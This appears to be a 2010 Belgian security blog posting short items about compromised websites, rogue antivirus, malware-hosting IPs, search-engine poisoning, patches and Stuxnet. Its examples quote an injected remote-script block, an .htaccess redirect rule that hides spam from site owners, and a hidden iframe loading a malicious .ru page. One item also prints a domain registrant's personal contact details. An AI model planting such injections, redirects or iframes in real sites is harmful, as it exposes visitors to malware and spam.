itsecurity

  • some domains you could consider blacklisting

    while you would whitelist some particular sites if you would need them

    report from McAfee see security dashboard - my diigolinks (documents)

    bo39.jpg

  • Korean Malware IP adress 114.207.244.143

    This Ip address has according to Google Badware been a hotbed of malware and infections

     

     

    bo38.jpg

    as confirmed by trustedsource (HIGH Risk)

     

  • new rogue securityware from my-security93.co.cc passes different antivirus and other protections

     

    yes machine in simple user rightsbo37.jpg

    yes in Firefox with no script

    yes two antiviruses running on the machine

    yes behind firewalls, proxies and blacklisting and so on

    yes it just popped up and began scanning

    just closed down Firefox abruptly (list of applications

    No I didn't download or install it because if it can pass that, what else can it do

    and the list of viruses that it said it had found changes every time

     

    enough to scare the simple user away and if it passes all these securitythings, it must be secure or part of the necessary security no ?

    It is NOT blacklisted yet

    http://www.robtex.com/dns/my-security93.co.cc.html

    and according to Virustotal

    Firefox Clean site

    Google Safebrowsing Clean site

    Opera Clean site

    Phishtank Clean site

    Smartscreen Clean site

    TRUSTe Clean site
    http://www.virustotal.com/

    It uses the following Korean servers

    114.207.244.143
    114.207.244.144
    114.207.244.145
    114.207.244.146

    on which there are a whole lot of other .cc servers (some small islands with a frequently abused domainzone)

    the technical people responsable are

    AS9318
    HANARO-AS Hanaro Telecom Inc. Yeoeuido-dong Yeongdeungpo-gu SEOUL 17-7 Asia One Bldg. 150-874

    These IP numbers are also used by Malaysian hackers because their sites are hosted there

    malaysian-hackers.co.cc

  • Youtube user thenameisskittles used in online malware campaign with .be sites

    It is being done by inserting pages that imitates Youtube pages with videos on other sites

    the trick is simple - to view the video one has to download a new codec - but that ain't a codec (it is a virus) but explain that to your teenager who wants to see Justin Beeber and thinks it is some kind of Youtube.

    David Evans Controller | management.degarage.nl

    Deze site kan schade toebrengen aan uw computer.
    DAVID EVANS CONTROLLER. thenameisskittles 18 videos. Subscribe. 151960 views. Help About Safety Privacy Terms . . david evans controller. . david evans ...
    management.degarage.nl/random/index.php?news=david-evans.


    The Googledork is  youtube thenameisskittles

    and for Belgium you add  site:be   you can change that for whatever site or domain you have to be sure

    PROTEUS VSM 7.1 SP4

    Deze site kan schade toebrengen aan uw computer. (ps all the rest as well)

    PROTEUS VSM 7.1 SP4. thenameisskittles 4 videos. Subscribe. ... VSM 7.1 SP4, download PROTEUS VSM 7.1 SP4, EFFECTMATRIX YOUTUBE VIDEO DOWNLOAD TOOL PRO 3.0, ...
    www.jolieboutique.be/script/proteus+vsm+7.1+sp4.html

    justinbiebermusic.com\/goldenticket

    Be sure to subscribe to us, and Turnip Time www.youtube.com Thanks again to all that helped. ..... COM/GOLDENTICKET. thenameisskittles 4 videos Subscribe. ...
    os.be/info/justinbiebermusic.com%5C/goldenticket - In cache
    1. BARFOOTANDTHOMPSON.CO.NZ

      7 Jun 2010 ... Barfootandthompson.co.nz. belmont stakes odds . BARFOOTANDTHOMPSON.CO.NZ. thenameisskittles 4 videos. Subscribe . Barfootandthompson.co.nz ...
      gt-motorsports.be/webshop/.../barfootandthompson.co.nz.html - In cache
    2. EZRECORDED 1.0

      EZRECORDED 1.0. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . EZRecorded 1.0 ...
      www.manzi.be/script/EZRecorded+1.0.html - In cache
    3. Hot Video: pilipinas win na win

      13 Ago 2010... Na Win (First Episode) 31 July 2010 Brought to you by FlipBooth – The Pinoy Style Youtube . .... thenameisskittles 18 videos. Subscribe ...
      www.fitstar.be/images/page.php?page=pilipinas+win... - In cache
    4. LADYLADY345

      GROUP/LADYLADY345. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . ...
      www.loomans-distribution.be/catalog/.../ladylady345.html - In cache
    5. /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE

      SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. ... /SEARCH HL EN Q SITE WWW.
      YOUTUBE.COM YOUTUBE. thenameisskittles 4 videos. Subscribe. 151960 views ...
      www.leathershop.be/...//search+hl+en+q+site+www.youtube.com+youtube.html - In cache
    6. Hot Video: lil kim

      YouTube streaming video - Lil' Kim & Ray J Take Shots at Nicki Minaj . - During Lil Kim's Concert in New York ... thenameisskittles 18 videos. Subscribe ...
      www.mrwtrading.be/b2b/images/news.php?page=lil... - In cache
  • sleepy.be (commercial site) totally spam-hacked

    site:sleepy.be  video as example


    Supersize Me Video
    Supersize Me Video August 5, 2010. ... Supersize Me Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
    motieven.sleepy.be/sleepy/supersize-me-video.html - In cache

    Danny Almonte Video
    Danny Almonte Video August 8, 2010. ... Danny Almonte Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
    motieven.sleepy.be/sleepy/danny-almonte-video.html - In cache

    Elke The Stallion
    Download Elke The Stallion and Maliah Michel (Digital Dolls) video on savevid.com. ... I give you video model Elke the Stallion. Checkout her site, crazy. ...
    motieven.sleepy.be/sleepy/elke-the-stallion.html - In cache

    Khia New Video
    12 Aug 2010 ... Khia looks so excited to be trapped in a TV in Janet's new video . On the heels of her new single, “Been A Bad Girl,” Khia took time off . ...
    motieven.sleepy.be/sleepy/khia-new-video.html - In cache

    Cspan Video
    8 Aug 2010 ... Cspan Video August 8, 2010. ... Cspan Video. Template design by Free CSS Templates · cynthia rodriguez · lake county indiana ...
    motieven.sleepy.be/sleepy/cspan-video.html - In cache

    Royce Reed Video
    6 Aug 2010 ... Royce Reed Video August 6, 2010. ... Royce Reed Video. Template design by Free CSS Templates · tommy bowden · phiten necklaces ...
    motieven.sleepy.be/sleepy/royce-reed-video.html - In cache

    Pygmy Tarsier Video
    Pygmy Tarsier Video August 7, 2010. ... Pygmy Tarsier Video. Template design by Free CSS Templates · brooke astor · mark loretta · highdeas · matt holliday ...
    motieven.sleepy.be/sleepy/pygmy-tarsier-video.html - In cache

    City High Caramel Video
    6 Aug 2010 ... City High Caramel Video August 6, 2010. ... City High Caramel Video. Template design by Free CSS Templates ...
    motieven.sleepy.be/sleepy/city-high-caramel-video.html - In cache

  • Belgian site uses Justin Bieber to place malware

    Jamie Bieber Boyfriend Hot Video

    27 Jul 2010 ... jamie bieber boyfriend hot video · jamie boyfriend hot video justin bieber · bieber boyfriend hot video jamie foxx ...
    motieven.sleepy.be/.../jamie-bieber-boyfriend-hot-video.html
    This gives this
    person: Vadim Makarenko
    address: Leningradskaya 28 kv 26, Bendery, Moldova
    e-mail: XXXXXXX@gmail.com
    phone: +373-680-45324
    nic-hdl: VM3351-RIPE
    source: RIPE # Filtered

    This is a redirect

    It tries to install malware

    they didn't see it since the 27th of july ..... we are the 19th

    going to report it to the CERT here

    Panda labs found another 200 such sites

    just tried the obvious title with site:be and found this one but you can do this for any other country of domainextension

    "hot video : justin bieber" site:be

  • critical ADOBE PDF and flash updates

    Adobe is planning to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 for Windows, Macintosh and Unix as well as the Adobe Acrobat 9.3.3 for Windows and Macintosh and an update for Adobe Reader 8.2.3 and Acrobat 8.2.3 for Windows and Macintosh covered in security bulletin APSB10-17. An update for Adobe Flash Player published in security bulletin APSB10-16 will be released as well.

    Affected Software

    Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
    Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh

    Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris
    http://isc.sans.edu/index.html

    You have no choice but to install them - the number of attacks on these vulnerabilities is too big and the botnets that use them (Zeus for example) are too dangerous

     

  • stad mechelen forgot about its old blog but spammers didn't

    You have the website stadmechelen.be that now resolves to mechelen.be

    under stadmechelen.be that is still active you have blog.stadmechelen.be but that doesn't resolve to blog.mechelen.be or a www.blog.stadmechelen.be but has been transferred to mechelenblogt.be

    so far so good but

    as the website stadmechelen.be is still active (in a redirect) blog.stadmechelen.be is also still active

    and has been abused by the following injected script

    <title>Best Searches</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" type="text/css" media="all" href="http://find.gl/js.css" />
    <script>
    function init_aw(){
    var children = document.getElementsByTagName('td');
    var l = children.length;
    var ri = 0;
    for(i=0;i<l;i++){
    if (children[i].className=='ac'){
    children[i].onmouseover=function (){this.className='ach';};
    children[i].onmouseout=function (){this.className='ac';};
    children[i].onclick=new Function('document.location="' + results[ri][3] + '";');
    ri++;
    }
    }
    }
    </script>
    </head>
    <body>
    <script src="http://find.gl/js.php?qr=3&f=h&q=inurl%3Acracks%20site%3Abe"></script>
    <script>document.onload=init_aw();</script>
    </body>

    and that gives you the following search results

    crack black and white 2 , download, cd to mp3 ripper v 5.2 serialz, counter strike license torrent,
    www.blog.stadmechelen.be/7645 · Pagina in cache

    EWallet cell phone, download nitto 1320 cheat engine, 228289, crack sonar 4.01 producer edition,
    www.blog.stadmechelen.be/5951 · Pagina in cache

    sonic pc download full, update firmware dth 222 2006, katja kassin sex and submission movie,

    for the foreign readers
    * mechelen is a big city around brussels
    * it has its fair amount of problems and possible risks
    * its official website is according to official rules from the government one of the main instruments of crisiscommunication if needed
  • observatoire du tourisme Wallonie.be infected with Viagra spam

    link


    Lkioweytrert generic zovirax - zovirax what is it viagra valium kamagra discreet uk europe - las vegas kamagra viagra about valtrex aciclovir zovirax - when does patent on valtrex expire imitrex story - purchase imitrex cash on del what is paxil - how ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

    DrLaquanda 1, cheap viagra in moldova, kmb, purchase zovirax in djibouti, gcnrcx, purchase sumycin in iowa, 016928, buy biaxin er online without a prescription, ldm, buy darvocet in alberta, knk, buy cheap tadalafil online cheap vs generic., :-]],
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

    SynxavIQZxwdi tramadol imq viagra ljpem xanax hun buy 150 tramadol =] acomplia qjws Proposé le 23 mai 2010, par TRJdivGdAAK tYMwqLGQnhuXmg no prescription cialis 41514 retin :-[ buy href tramadol 363 ultram pill identifier 4856 tramadol
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

    http://miguelcabrera.us/index.html comment5, Tamiflu, Zithromax, Nolvadex, Retin-A, Viagra, Metformin, Proposé le 13 juillet 2010, par Ambien http://tulowitzki.us/index.html comment5, Xanax, Tamiflu, Nolvadex, Retin-A, Bactrim, Proposé ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

    DrLou 1, cheapest sale viagra purchase viagra buy in uk high quality. online no prescription ! !, [url="http://wvagp.org/Forums/members/Buy-VIAGRA-On-Line.aspx"]cheapest sale viagra purchase viagra buy in uk high quality. online no ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?​id... · Pagina in cache

  • a hidden compromised website : now the php trick

    We have seen in the previous post how one attacker hides his victory by using the Apache server modules to differ the kind of pages to show to the normal visitors (the website) and the searchengines (the spam/scam pages he added).

    There is also another trick one can do according to the Internet Storm Center.

    One can add on a PHP site a script that will tell the controller of the PHP server which page to serve to who and its instructions would be more or less identical.

    "The attackers planted one file (usually called page.php or wp-page.php) on every web site – they didn’t change anything else. The page.php script does the majority of work. It actually just asks the main controller what to do when it receives a request. The request sent to the controlled is interesting – it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to be able to constantly change how any script behaves. This master script, in a nutshell, does this:

    First it checks if the request to the page.php script contains the “r=” parameter. If it doesn’t (meaning, you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.

    1. if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content with links to rogue securityware is returned.

    2. if you visit the script directly (no referrer) it again displays a 404 error.

    3. if the referrer is set to Google, Yahoo or Bing (meaning, the user clicked on a search result), the browser is redirected to a third site (and possible fourth) that displays the infamous RogueAV"

    The rest of the technicalities is explained in the post but it is clear that if you use PHP you should patch and harden everytime anytime and if you can't do it yourself you should be sure that some hoster is doing that for you, otherwise one moment or another you will be cooked.

  • another twist in compromising websites - htaccess control and searchengine poisoning

    We have seen that some malvertising (and the driveby malware downloads or redirects) are only shown to a certain number of visitors and this was also seen in some dns poisoning if i remember it well.

    In this post from the Internet Storm center there is something even more interesting - trying to hide the fact that a site is compromised (probably against searchengines and securitybots scanning for infections and take-overs).

    The same site is sometimes infected/takenover and sometimes not, just the normal library site.

    "Rather than mucking around with the code for the site itself, the bad guys target the .htaccess files.  For those of you unfamiliar with the workings of webservers, .htaccess files are used by the Apache webserver (and some others…) to provide a way to make configuration changes to the server itself, on a per-directory basis.  So, for instance, you can use an .htaccess file to change the way that the webserver treats specific types of files in a single directory only.

    The bad guys also leverage another Apache “tool,” known as mod_rewrite. This tool provides a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested URLs on the fly.

    So, while I never actually got my hands on an altered .htaccess file, I have a pretty good idea of what they look like:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra|levitra).*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra|levitra).*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra|levitra).*$
    RewriteRule .* http://badsite.com [R,L]

    http://isc.sans.edu/diary.html?storyid=9388"

    The result is that when Google comes by they will index the added pages with scams and spam in the best case and porn and pirated films or creditcards in the worst case. This should show up in your logs - if they didn't change the logging to suppress it for these new pages. Your normal visitors and probably yourself will see nothing of that and will work on a normal website like ever before.

    It means that you need a tripwire like monitoring of everything of your webserver. If something changes somewhere you should know or be able to know.

     

  • Humo, libelle, telemoustique were lucky, others still sleeping malware agents for nemohuildiin.ru

    first not all sites or pages that are shown in googledorks are in fact still infected, the reason is that they didn't indicate to Google that they were the owners of the domain and that Google didn't came back after the clean-up.

    But it does show that these sites were injected with this kind of scripts and maybe haven't reviewed their securitypolicies and can in future again be abused.

    If you read the post on the Internet Storm Center that is it interesting that those infections for the moment were not only very professional but they didn't load any malware... untill when. When you take into consideration that the site in question is on the list of the Zeus Botnet command and control servers, you can only assume that they were building a new network for a new attack (linked to spam that would have sent their users to these pages on these normal trustworthy popular websites of popular magazines). Or that some of the network has been disbanded or overtaken and that they couldn't get access to their infected 'sleeping cells'.(terrorism language)

    and this advice you should post on your wall somewhere

    "SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:

    • Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
    • Use store procedures: Your web application should have predetermined SQL sentences for data access. If the user request some specific information, the application invokes the specific store procedure, so there is no possibility of crafting dynamic SQL request.
    • Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
    • Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful."

    http://isc.sans.edu/diary.html?storyid=9397

     

     

  • fastflux botnet campaigns with .eu domainnames

    Arbor Networks

    iseveral.eu
    lifestylerxdrugs.eu
    medicationjobs.eu
    nypharmacyjobs.eu
    rxdrugscentral.eu
    rxdrugsdot.eu
    rxdrugsinc.eu
    selfcarepharmacy.eu
    superhotpharmacy.eu
    yourchoicepharmacy.eu

    these are pure fastflux domainnames that can only be blocked by the .eu operator (belgian based)

    It is clear that many of those new fastflux domainnames are being used for healthspam campaigns

    Many of  them are .ru domainnames (and .com and .net but you can't block these domainextensions)

  • securityproblems with NTML make me laugh

    There has been some problems with NTML and some hype and crisiscommunication about it

    But NTML was never intended to be a very secure protocol for communication and authentification.

    In windows7 it is standard OFF.

    You should use Kerberos.

    Don't go on trying to fix that old NTML, just use Kerberos or smartcardauthentification or whatever

    and for the articles, it is summertime...

  • small hosters and ISP's targeted by malware hosters

    not to attack you

    but to pay you real hard dollars for hosting

    as long as you don't ask too many questions

    and don't have too much security

    and don't respond too quickly to complaints about me

     

    it is being seen in fact the last year but is becoming more a method of 'flux hosting' jumping from one to another

    The problem with such small ISP's/hosters is that in small countries they are so important in their own country/network that many other businesses and even government services have an impact when the world begins to blacklist the whole network/host/domainzone.  As it are small networks or countries most of the world doesn't care a bit about their network or domainextension because the relative influence in nihil.

    Just block it, we don't have time for this, that they clean up their business and than we will see afterwards, have more important things to do for a domainextension, network or country very few care about.

    This is what is happening with .lv (latvia) and spamhaus (and the securitycommunity siding with spamhaus)

    So even if you are a small hoster, ISP, network, domainextension you still need to

    * have a general minimal security-installation (antivirus, firewall, IDS,....)

    * have a contactable securityteam that responds quickly to incidents that are brought to their attention or that they have detected

    otherwise you are just thrown in the blackhole of the internet, ready to be forgotten

  • better a Web application firewall than having to make your pages turn into this

    when some big Belgian sites where attacked with the Zeus redirection scripts, they had to act swiftly because Belgian visitors were actively being redirected

    so they disactivated the html and the scripts and the links

    but this makes some old pages look ugly

    bo36.jpg

    the alternative is setting a WAF with a blacklist before your sites - filtering in and outgoing traffic - to defend yourself and your visitors/clients - and your income as you can't be used to attack others and be sued for it.

  • when you have cleaned up your sql injections, go to Google

    As long as you didn't go to Google, register yourself and insert the code that you are the domainowner in your websites, you can't ask Google to revisit your pages quickly and to forget that once you were infected or hacked

    A many sites today are still in Google as being hacked or injected

    Those that were injected run the most chance of just being blocked by lists and crawlers

    and who will want to go to a page for which it receives a warning ?

    while there are thousands of other pages from your competitors to visit who don't have such a warning ?

    example
    Links | Libelle
    Libelle is het blad voor de actieve vrouw, die niet alleen haar gezin belangrijk vindt, maar ook haar eigen ontwikkeling en de wereld waarin ze leeft.
    www.libelle.be/lib/op-stap/links.html?subcatId=113 - En caché
    Mostrar más resultados de www.libelle.be

    Te koop - ABIP IMMO
    Gemeente: Roosdaal<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: € 285.000,00 ...
    www.abipimmo.be/showresults.asp?Tid=322 - En caché - Similares

    It also means that all those searches for scripts and hacks that show thousands of pages aren't necessarily true but they do show the least that the person didn't finish the job completely (so can you expect them from also blocking the injections in future ?)

    once attacked always scanned and attacked

  • finding infected posts with trustedsource.org (telenet, belgacom and other Belgians)

    When you go to www.trustedsource.org you can type in the name of the domain and than you will see if it is generally trusted or not

    If you have more than one post  or server that may send mail you will see further down the page the change of number of emails that are being sent from this post or server.

    Normally an increase of at least 100% will probably have something to do with a virus or spamoperation

    Let's taken for example http://www.trustedsource.org/query/telenet.be

    Than you will find the following posts that are according to this analysis as probably infected (all on sunday)

    http://www.trustedsource.org/query/81.82.254.17

    http://www.trustedsource.org/query/81.82.233.5

    http://www.trustedsource.org/query/84.199.49.98

    http://www.trustedsource.org/query/81.82.197.34

    If we take skynet.be

    http://www.trustedsource.org/query/194.78.197.208

    http://www.trustedsource.org/query/194.78.221.215

    or scarlet.be

    http://www.trustedsource.org/query/62.235.228.87

    http://www.trustedsource.org/query/62.235.232.224

    http://www.trustedsource.org/query/62.235.241.85

    http://www.trustedsource.org/query/62.235.242.195

    http://www.trustedsource.org/query/62.235.249.90

    http://www.trustedsource.org/query/81.11.183.156

    and so on

    this means that all those posts are sending spam and viruses on the world wide web where they have been captured by honeypots.

    this means that the ISP's have a problem with their argument that they are defending their walls instead of offering free securityware to their clients as the New Telecom asks them to

     

  • patching and security of applesoftware on windows comes second

    When I read this blogpost of this researcher who found another critical bug in Safari (swiss cheese) the following is clear

    * the internal securitytests for Safari are not that sufficient

    * they first fix the bug for the Apple environment and than eventually will research and patch the bug for the windows environment

    If this is true, it changes the risk of letting users use safari (or maybe any other apple software) on your windows network..... If you even thought that would be a good idea.

  • an absolute must read for people working with scada and critical infrastructure

    If what is written in this blog wouldn't be that important I wouldn't have copied it in its entirely. But if you read what the researchers have found out about stuxnet (the father of the .lnk vulnerability that is now also present in documents) than you will see that you will have to monitor every change of code that happpens in a machine. For the moment this is only for these particular installations but it maybe the next generation of rootkits that we maybe should could 'codekits' that replace one set of code with another set without changing anything on the outset in the availability and functionality of the machine or application.

    "As we’ve explained in our recent W32.Stuxnet blog series, Stuxnet infects Windows systems in its search for industrial control systems, often generically (but incorrectly) known as SCADA systems. Industrial control systems consist of Programmable Logic Controllers (PLCs), which can be thought of as mini-computers that can be programmed from a Windows system. These PLCs contain special code that controls the automation of industrial processes—for instance, to control machinery in a plant or a factory. Programmers use software (e.g., on a Windows PC) to create code and then upload their code to the PLCs.

    Previously, we reported that Stuxnet can steal code and design projects and also hide itself using a classic Windows rootkit, but unfortunately it can also do much more. Stuxnet has the ability to take advantage of the programming software to also upload its own code to the PLC in an industrial control system that is typically monitored by SCADA systems. In addition, Stuxnet then hides these code blocks, so when a programmer using an infected machine tries to view all of the code blocks on a PLC, they will not see the code injected by Stuxnet. Thus, Stuxnet isn’t just a rootkit that hides itself on Windows, but is the first publicly known rootkit that is able to hide injected code located on a PLC.

    In particular, Stuxnet hooks the programming software, which means that when someone uses the software to view code blocks on the PLC, the injected blocks are nowhere to be found. This is done by hooking enumeration, read, and write functions so that you can’t accidentally overwrite the hidden blocks as well.

    Stuxnet contains 70 encrypted code blocks that appear to replace some “foundation routines” that take care of simple yet very common tasks, such as comparing file times and others that are custom code and data blocks. Before some of these blocks are uploaded to the PLC, they are customized depending on the PLC.

    By writing code to the PLC, Stuxnet can potentially control or alter how the system operates. A previous historic example includes a reported case of stolen code that impacted a pipeline. Code was secretly “Trojanized” to function properly and only some time after installation instruct the host system to increase the pipeline's pressure beyond its capacity. This resulted in a three kiloton explosion, about 1/5 the size of the Hiroshima bomb.

    Thus, in addition to cleaning up the Stuxnet malware, administrators with machines infected with Stuxnet need to audit for unexpected code in their PLC devices. We are still examining some of the code blocks to determine exactly what they do and will have more information soon on how Stuxnet impacts real-world industrial control systems.

    Finally, we’ve reserved the in-depth technical details on how Stuxnet achieves this rootkit functionality for a future technical whitepaper, which will delve into other features of Stuxnet as well that we haven’t had a chance to blog about. For example, a couple of other interesting things include the fact that it uses an infection counter before deleting itself (it is set to ‘3’) and also can use MS08-067, the same vulnerability used by Downadup (a.k.a. Conficker) to spread.

    So, please stay tuned.
    http://www.symantec.com/connect/blogs/stuxnet-introduces-first-known-rootkit-scada-devices"

    THis will be a must read report that will make waves and may be the first step into integrating versioncontrol and tripwirelike monitoring an integrated part of the infrastructure and applications.

    Sorry for copying but this post is so well written and you should read it now and not later when you have time that I have copied it in its entirely. I do this very very seldom and it is only because of the enormous importance of what is discovered that I have done so.

    Said somebody something about holidays ? Maybe all those hackers and malwaremakers were bored .....